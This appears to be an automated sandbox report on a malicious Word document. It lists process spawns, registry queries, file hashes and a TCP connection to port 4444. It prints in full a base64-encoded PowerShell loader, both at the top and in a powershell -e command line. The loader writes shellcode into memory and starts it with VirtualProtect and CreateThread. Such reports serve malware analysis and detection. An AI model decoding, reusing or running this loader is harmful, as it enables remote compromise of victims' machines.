QA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADAALAB9AGEAOAAsAH0AZQAwACwAfQBhAGQALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADEAMQAsAH0ANQBjACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABhACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0AZQA4ACwAfQA2ADcALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0AMAAwACwAfQA2AGEALAB9ADAANAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAyACwAfQBkADkALAB9AGMAOAAsAH0ANQBmACwAfQBmAGYALAB9AGQANQAsAH0AOAAzACwAfQBmADgALAB9ADAAMAAsAH0ANwBlACwAfQAzADYALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZAAsAH0AMgA4ACwAfQA1ADgALAB9ADYAOAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADAAYgAsAH0AMgBmACwAfQAwAGYALAB9ADMAMAAsAH0AZgBmACwAfQBkADUALAB9ADUANwAsAH0ANgA4ACwAfQA3ADUALAB9ADYAZQAsAH0ANABkACwAfQA2ADEALAB9AGYAZgAsAH0AZAA1ACwAfQA1AGUALAB9ADUAZQAsAH0AZgBmACwAfQAwAGMALAB9ADIANAAsAH0AMABmACwAfQA4ADUALAB9ADcAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AZQA5ACwAfQA5AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBjADEALAB9AGMAMwAsAH0AYgBiACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA1ADMALAB9AGYAZgAsAH0AZAA1ACIAOwAkAHYARwA9AEEAZABkAC0AVAB5AHAAZQAgAC0AcABhAHMAcwAgAC0AbQAgACQAUABMACAALQBOAGEAbQBlACAAIgBwAHgAIgAgAC0AbgBhAG0AZQBzACAAcQB5AGIAOwAkAHYARwA9ACQAdgBHAC4AcgBlAHAAbABhAGMAZQAoACIAcQB5AGIAIgAsACAAIgBXAGkAbgAzADIARgB1AG4AYwB0ACIAKwAiAGkAIgArACIAbwBuAHMAIgApADsAWwBiAHkAdABlAFsAXQBdACQAVwBRACAAPQAgACQAVwBRAC4AcgBlAHAAbABhAGMAZQAoACIAfQAiACwAIgBTAGoAbQB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAFMAagBtACIALAAgACIAMAAiACkALgBTAHAAbABpAHQAKAAiACwAIgApADsAJABzAEYAPQAwAHgAMQAwADAANwA7AGkAZgAgACgAJABXAFEALgBMACAALQBnAHQAIAAwAHgAMQAwADAANwApAHsAJABzAEYAPQAkAFcAUQAuAEwAfQA7ACQAVQBQAD0AJAB2AEcAOgA6AGMAYQBsAGwAbwBjACgAMAB4ADEAMAAwADcALAAgADEAKQA7AFsAVQBJAG4AdAA2ADQAXQAkAGMAcgBtACAAPQAgADAAOwBmAG8AcgAoACQAUwBvAD0AMAA7ACQAUwBvACAALQBsAGUAKAAkAFcAUQAuAEwAZQBuAGcAdABoAC0AMQApADsAJABTAG8AKwArACkAewAkAHYARwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAUAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABTAG8AKQAsACAAJABXAFEAWwAkAFMAbwBdACwAIAAxACkAfQA7ACQAdgBHADoAOgBWAGkAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKAAkAFUAUAAsACAAMAB4ADEAMAAwADcALAAgADAAeAA0ADAALAAgAFsAUgBlAGYAXQAkAGMAcgBtACkAOwAkAG8AbQBsAD0AWwBpAG4AdABdADAAeAAwADAAOwAkAHYARwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABbAGkAbgB0AF0AMAAsACQAbwBtAGwALAAkAFUAUAAsADAALAAwACwAMQAtADEAKQA7ACcAOwAkAFoATwA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAUABOACkAKQA7ACQAdgBJAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAHEARwA9ACIAVwBpAG4AZABvAHcAcwAiADsAJABjAFYAVgAgAD0AIAAiAEMAOgBcACQAcQBHAFwASgB1AEcAUQBZAFcAXAAkAHEARwAkAHYASQBcAHYAMQAuADAAXAAkAHYASQAiADsAJABjAFYAVgAgAD0AIAAkAGMAVgBWAC4AcgBlAHAAbABhAGMAZQAoACIASgB1AEcAIgAsACAAIgBzAHkAcwAiACkAOwAkAGMAVgBWACAAPQAgACQAYwBWAFYALgByAGUAcABsAGEAYwBlACgAIgBRAFkAVwAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAHYAbgBSACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAbgBSACcAKQB7ACQAdgBJAD0AIAAkAGMAVgBWAH0AOwAkAEEAaAA9ACIAIAAkAHYASQAgAEYAYwBMAFEAIAAkAFoATwAiADsAJABBAGgAPQAkAEEAaAAuAHIAZQBwAGwAYQBjAGUAKAAiAEYAYwBMAFEAIgAsACAAIgAtAG4AbwBlAHgAaQB0ACAALQBlACIAKQA7AGkAZQB4ACAAJABBAGgA

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -e JABQAEwAPQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAIgArACIAbgAiACsAIgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByACIAKwAiAG4AIgArACIAZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABjAHIAbQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAFcAUQA9ACIAfQBlADgALAB9ADgAZgAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgAwACwAfQA4ADkALAB9AGUANQAsAH0AMwAxACwAfQBkADIALAB9ADYANAAsAH0AOABiACwAfQA1ADIALAB9ADMAMAAsAH0AOABiACwAfQA1ADIALAB9ADAAYwAsAH0AOABiACwAfQA1ADIALAB9ADEANAAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMwAxACwAfQBmAGYALAB9ADAAZgAsAH0AYgA3ACwAfQA0AGEALAB9ADIANgAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AMwBjACwAfQA2ADEALAB9ADcAYwAsAH0AMAAyACwAfQAyAGMALAB9ADIAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADQAOQAsAH0ANwA1ACwAfQBlAGYALAB9ADUAMgAsAH0AOABiACwAfQA1ADIALAB9ADEAMAAsAH0ANQA3ACwAfQA4AGIALAB9ADQAMgAsAH0AMwBjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA0ADAALAB9ADcAOAAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0ANABjACwAfQAwADEALAB9AGQAMAAsAH0ANQAwACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOAA1ACwAfQBjADkALAB9ADcANAAsAH0AMwBjACwAfQAzADEALAB9AGYAZgAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBjADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9AGEAYwAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANAAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADAALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1ADgALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQA5ACwAfQA4ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADUAZAAsAH0ANgA4ACwAfQAzADMALAB9ADMAMgAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA3ADMALAB9ADMAMgAsAH0ANQBmACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQA4ADkALAB9AGUAOAAsAH0AZgBmACwAfQBkADAALAB9AGIAOAAsAH0AOQAwACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyADkALAB9AGMANAAsAH0ANQA0ACwAfQA1ADAALAB9ADYAOAAsAH0AMgA5ACwAfQA4ADAALAB9ADYAYgAsAH0AMAAwACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQAwAGEALAB9ADYAOAAsAH0AYwAwACwAfQBhADgALAB9AGUAMAAsAH0AYQBkACwAfQA2ADgALAB9ADAAMgAsAH0AMAAwACwAfQAxADEALAB9ADUAYwAsAH0AOAA5ACwAfQBlADYALAB9ADUAMAAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADQAMAAsAH0ANQAwACwAfQA2ADgALAB9AGUAYQAsAH0AMABmACwAfQBkAGYALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADkANwAsAH0ANgBhACwAfQAxADAALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADkAOQAsAH0AYQA1ACwAfQA3ADQALAB9ADYAMQAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADQALAB9ADAAYQAsAH0AZgBmACwAfQA0AGUALAB9ADAAOAAsAH0ANwA1ACwAfQBlAGMALAB9AGUAOAAsAH0ANgA3ACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2AGEALAB9ADAAMAAsAH0ANgBhACwAfQAwADQALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAMwAsAH0AZgA4ACwAfQAwADAALAB9ADcAZQAsAH0AMwA2ACwAfQA4AGIALAB9ADMANgAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADYALAB9ADYAYQAsAH0AMAAwACwAfQA2ADgALAB9ADUAOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMAAsAH0ANQA2ACwAfQA1ADMALAB9ADUANwAsAH0ANgA4ACwAfQAwADIALAB9AGQAOQAsAH0AYwA4ACwAfQA1AGYALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADMALAB9AGYAOAAsAH0AMAAwACwAfQA3AGQALAB9ADIAOAAsAH0ANQA4ACwAfQA2ADgALAB9ADAAMAAsAH0ANAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgBhACwAfQAwADAALAB9ADUAMAAsAH0ANgA4ACwAfQAwAGIALAB9ADIAZgAsAH0AMABmACwAfQAzADAALAB9AGYAZgAsAH0AZAA1ACwAfQA1ADcALAB9ADYAOAAsAH0ANwA1ACwAfQA2AGUALAB9ADQAZAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0ANQBlACwAfQA1AGUALAB9AGYAZgAsAH0AMABjACwAfQAyADQALAB9ADAAZgAsAH0AOAA1ACwAfQA3ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9AGUAOQAsAH0AOQBiACwAfQBmAGYALAB9AGYAZgAsAH0AZgBmACwAfQAwADEALAB9AGMAMwAsAH0AMgA5ACwAfQBjADYALAB9ADcANQAsAH0AYwAxACwAfQBjADMALAB9AGIAYgAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQA2AGEALAB9ADAAMAAsAH0ANQAzACwAfQBmAGYALAB9AGQANQAiADsAJAB2AEcAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAFAATAAgAC0ATgBhAG0AZQAgACIAcAB4ACIAIAAtAG4AYQBtAGUAcwAgAHEAeQBiADsAJAB2AEcAPQAkAHYARwAuAHIAZQBwAGwAYQBjAGUAKAAiAHEAeQBiACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdAAiACsAIgBpACIAKwAiAG8AbgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFcAUQAgAD0AIAAkAFcAUQAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAUwBqAG0AeAAiACkALgByAGUAcABsAGEAYwBlACgAIgBTAGoAbQAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQAcwBGAD0AMAB4ADEAMAAwADcAOwBpAGYAIAAoACQAVwBRAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADcAKQB7ACQAcwBGAD0AJABXAFEALgBMAH0AOwAkAFUAUAA9ACQAdgBHADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAA3ACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABjAHIAbQAgAD0AIAAwADsAZgBvAHIAKAAkAFMAbwA9ADAAOwAkAFMAbwAgAC0AbABlACgAJABXAFEALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAUwBvACsAKwApAHsAJAB2AEcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABVAFAALgBUAG8ASQBuAHQAMwAyACgAKQArACQAUwBvACkALAAgACQAVwBRAFsAJABTAG8AXQAsACAAMQApAH0AOwAkAHYARwA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJABVAFAALAAgADAAeAAxADAAMAA3ACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABjAHIAbQApADsAJABvAG0AbAA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJAB2AEcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwBpAG4AdABdADAALAAkAG8AbQBsACwAJABVAFAALAAwACwAMAAsADEALQAxACkAOwA=

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\peiwqxeg.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1D13.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1D12.tmp"

Network

Country Destination Domain Proto
N/A 192.168.224.173:4444 tcp

Files

memory/1852-0-0x000000002F331000-0x000000002F332000-memory.dmp

memory/1852-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1852-2-0x000000007168D000-0x0000000071698000-memory.dmp

memory/1852-6-0x0000000000500000-0x0000000000600000-memory.dmp

memory/1852-8-0x0000000000500000-0x0000000000600000-memory.dmp

memory/1852-7-0x0000000000500000-0x0000000000600000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 97c22dcacbd594f5601e846dda5b47e7
SHA1 da455548148439ced393769c650c58cafc837bf6
SHA256 e9af4febdadc7a470dc5c83f5bf6062d9264219ab318a87a3eee3a044abc8623
SHA512 f1edcda39413d8bc17b338c56527a4e0c91d0e4e1238a867d710ecdf5cbbfe2cb85cbfac150f03257c9506faad6ac4184b7ab16b04d67500a5bf0252d9a9db25

\??\c:\Users\Admin\AppData\Local\Temp\peiwqxeg.cmdline

MD5 7bb27c53af6b9541d02df14559aa78bd
SHA1 548fb5312227207ea73304ece74d7dd6b439ef3e
SHA256 dd70893e99fe7f289d7346f8121fc12a570200172692aafb603fa5eef54c221f
SHA512 7154a96d6c366c3175e9eb63abe861ebb6eb9dfb5993e32ad62c4f4e0b3a08afefbcca2da77f5d2cf085c106614027efbcfbffb5c78e84bc6d599e0f12fe7620

\??\c:\Users\Admin\AppData\Local\Temp\peiwqxeg.0.cs

MD5 983cad5e58b8e626d0bbb94f162c2530
SHA1 928e5a00d6770e304a4535dd46de98a2674bc6e1
SHA256 566297f4d486eba0ee60cdb68d4e0a3714c985a77a3be4ceeff5449ba11c3c1d
SHA512 1bf465fe68634c242b8493dde11a521d13aa2d95b60ccefc405dc53150d3654a1b699c6cab230d11c5e6655eaa72949040eec739b3125d7f8729bc028dffcda6

\??\c:\Users\Admin\AppData\Local\Temp\CSC1D12.tmp

MD5 d32311ee86c0341f415ad82994a4dc99
SHA1 d5fdcba4c54a8a116c818637f566d517638eb686
SHA256 67fe1007ed075d68e7f1eac6be60b8a5e5997fe86c4e349e2979293d94e32f4a
SHA512 01df066ba1c9c56bd9dc342e5a1bbac5ea83667a0102ec4d011062f548eac7466957fe9c30f43156b37678207351f62fe787461214a84f8af3c8d443ed099ce4

C:\Users\Admin\AppData\Local\Temp\RES1D13.tmp

MD5 11053f9591287b0a8bed2e69ad7b6361
SHA1 fd395575df7dc580dca572d9f5d8576ed4356db8
SHA256 bb0a344a4cc93701553e4e9004d08f38a2f8dd1082fe26a7792a34768a44fb8a
SHA512 a588a439191f64403ea4fd78e67c999b775864cd6ec8c869f8f3e5f3e4a9436c7075cb17e977c0ef66ed397e7fb20b2f87f4e111f8e4cfbd58ebcc0372a014bc

C:\Users\Admin\AppData\Local\Temp\peiwqxeg.dll

MD5 952fd1fbb06fd7204af702fd0428371c
SHA1 0adbcf4682367de3d3e9939c92a36d70c2e5379b
SHA256 e02c0daefbdd7a00bafac86f7523a36e8e56b5b9803cf53ef2b815bcbfc961b5
SHA512 6f97de612cf765b1d0fa2b512db6b3e99de8d3b029556b7e8eed64f79dad923716a90e32be7823888e302d7816685708c697f3f42c2b418b4c83520bf0e94b92

C:\Users\Admin\AppData\Local\Temp\peiwqxeg.pdb

MD5 4303bcb7d1534856f488b0c40c9cd732
SHA1 77f34194f64b2c11df7d3ab2ce53c43233b118ca
SHA256 14aa36eb2173167ffa2876dacabb738d731b2953733e4d91c714e618d1b711e6
SHA512 a7066afaddb94932c5536178c0be72ee76b01dc2fae4b49b7b1bcfa10bb5624c1da86aa4ab83f95211ecfa8b73b85b6b820fff3c2c299509843a7ff136ed135a

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 080c9edda6bd00bca2fcd2386c8176b4
SHA1 fa3576ed398e28159f64bfbd23fca4ed79349052
SHA256 1766fe15e1e9ebaeb83992b8220992f1374187d70ef8c0206a3cc0596d44facf
SHA512 afe0d41d99591c51d388751e8a727a67489b35f55956882bd4ce99d7b8e5ece98d16d5c522cabfa3f15d573f135cc0586db4ef4e56bd878dd0eaa629838ac65b

memory/1852-53-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1852-54-0x000000007168D000-0x0000000071698000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 06:00

Reported

2024-05-27 06:01

Platform

win10v2004-20240508-en

Max time kernel

50s

Max time network

59s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\587d3bebe78be7ea06c0b44720308541fe4c423714f975bfed98ca0b65c71603.doc" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2236 wrote to memory of 2552 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 2552 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 4924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 4924 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4924 wrote to memory of 2980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
PID 4924 wrote to memory of 2980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
PID 4924 wrote to memory of 2980 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
PID 2980 wrote to memory of 4160 N/A C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2980 wrote to memory of 4160 N/A C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 2980 wrote to memory of 4160 N/A C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 4160 wrote to memory of 1020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4160 wrote to memory of 1020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
